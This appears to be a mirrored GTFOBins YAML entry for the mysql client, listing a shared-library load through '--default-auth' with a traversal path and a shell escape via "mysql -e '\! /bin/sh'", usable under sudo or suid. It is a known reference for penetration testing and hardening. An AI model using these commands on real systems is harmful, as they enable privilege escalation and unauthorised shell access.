1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2026-03-07 14:36:23 +01:00
GTFOBins.github.io/_gtfobins/mysql
2026-01-12 01:16:43 +01:00

25 lines
461 B
Plaintext

---
comment: |-
A valid MySQL server must be available to connect to.
functions:
library-load:
- code: |-
mysql --default-auth ../../../../../path/to/lib
comment: |-
The following loads the `/path/to/lib.so` shared object.
contexts:
sudo:
suid:
unprivileged:
version: |-
5.5
shell:
- code: |-
mysql -e '\! /bin/sh'
contexts:
sudo:
suid:
shell: true
unprivileged:
...